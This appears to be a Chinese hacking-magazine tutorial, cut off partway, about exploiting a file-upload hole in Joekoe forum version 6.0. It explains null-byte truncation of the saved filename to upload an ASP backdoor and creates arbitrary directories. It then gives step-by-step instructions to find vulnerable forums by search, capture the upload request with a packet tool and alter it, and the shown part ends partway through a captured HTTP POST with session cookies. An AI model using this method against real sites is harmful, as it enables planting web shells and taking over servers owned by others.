文/勇哥(看完我真是无话可说,for6.0的漏洞,我真@#@$%$#^&^*&.....)前一阵动网Upfile.asp文件漏洞真可谓影响深远。把空格（ASC为20H）改成为空（ASC为00H）也就是符串结束符“\0”来成功欺骗计算机，这种提交数据的方式使我深受启发，由此才有此文：乔客6.0的Upload.asp漏洞。同时，也把本篇文章作为的一件更好的生日礼物，献给我最漂亮、最善解人意的女朋友俊俊！漏洞危害：　　1．用户可以随意建目录。2．用户可以上传任意后缀名的文件。下面先来看一下在Upload.asp文件中存在的如下代码：ifnotMyFso.folderExists(up_path)thensetup_path=MyFso.CreateFolder(up_path)endif如果上传目录不存在，会自动创建，这样我们就可以随便建目录了。再看：upfile_name=up_name&"."&upfile_nameupfile.SaveAsup_path&upfile_name可见上传后文件名是：“upfile_name=up_name&"."&upfile_name”，其中Up_name由年、月、日和一个随机数组成，如：2004610173526，而“.”后面的Upfile_name为合法的后缀名，如GIF，本来这是很正常的改名方式，但是计算机在检测字符串时是看是否碰到“\0”字符，如果是，则认为字符串结束了。也就是说我们在构造上传文件名时，只要欺骗计算机，把“2004610173526”文件名改成“2004610173526.asp\0”这样的方式，后面一连串的时间字符我们都可以不要了，从而达到直接将文件名保存为我们定义的文件名的目的。原理是枯燥的，实例才最有趣，下面给大家讲一个详细的利用这个漏洞入侵某论坛的例子。漏洞利用：首先在百度里搜索关键字“版本：JoekoeV6.0”，然后会出现好多这样的论坛，我们随便挑一个论坛去注册，然后再打开论坛的任意一个版块如“笑话天地”（http://www.******.com/bbs/forum_list.asp?forum_id=9），点击左上角的“发表新贴”按钮（http://www.******.com/bbs/forum_write.asp?forum_id=9），发新帖子。上面的准备工作做完后，下面我们就可以正式开始挑战这个论坛了。需要用到的工具有WinSockExpertV0.6beta1、UltraEdit、NC、ASP后门和新鲜鸡蛋几只，均可在光盘中找到（咳，鸡蛋是给大家吃的，可别用来扔我，呵呵）。下面我们正式开始：　　运行WinSockExpert->点“openprocess”按钮->打开IExplore.exe进程，选中第二步打开的网页（某某论坛-笑话开地，发表新贴）->点“open”按钮，这样WinSockExpert就可以监听刚才打开的网页的一举一动了。我们的目的是想要抓取数据上传的包并做进一步的修改。　　然后使用“上传文件”这一功能，浏览上传我们的ASP后门。我用的是“冰狐浪子微型ASP后门”，成功后再配合“海阳顶端2004”一起发挥作用，效果还不错，大家可以考虑这种配合方式。点击“上传”后，页面会出现“上传失败：文件类型只能为gif、jpg、bmp、swf、rar、zip等格式，返回上一页”，不用理会它，现在我们需要的就是这样的信息。　　赶紧到WinSockExpert中提取抓获的有用数据，内容如下：POST/bbs/upload.asp?action=upfileHTTP/1.1Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash,*/*Referer:http://www.******.com/bbs/upload.asp?uppath=forum&upname=&uptext=jk_wordAccept-Language:zh-cnContent-Type:multipart/form-data;boundary=---------------------------7d311f101009cAccept-Encoding:gzip,deflateUser-Agent:Mozilla/4.0(compatible;MSIE5.01;WindowsNT5.0)Host:www.******.comContent-Length:710Connection:Keep-AliveCache-Control:no-cacheCookie:joekoe%5Fonline=onlines=1&login%5Fpassword=fb411be97b3b0d48&guest%5Fname=&iscookies=yes&login%5Fusername=test;ASPSESSIONIDAS *** AATR=CNBCLACDOHPJIDDNHLCCICLP -----------------------------7d311f101009cContent-Disposition:form-data;name="up_path" forum-----------------------------7d311f101009cContent-Disposition:form-data;name="up_name" 200473153438----------------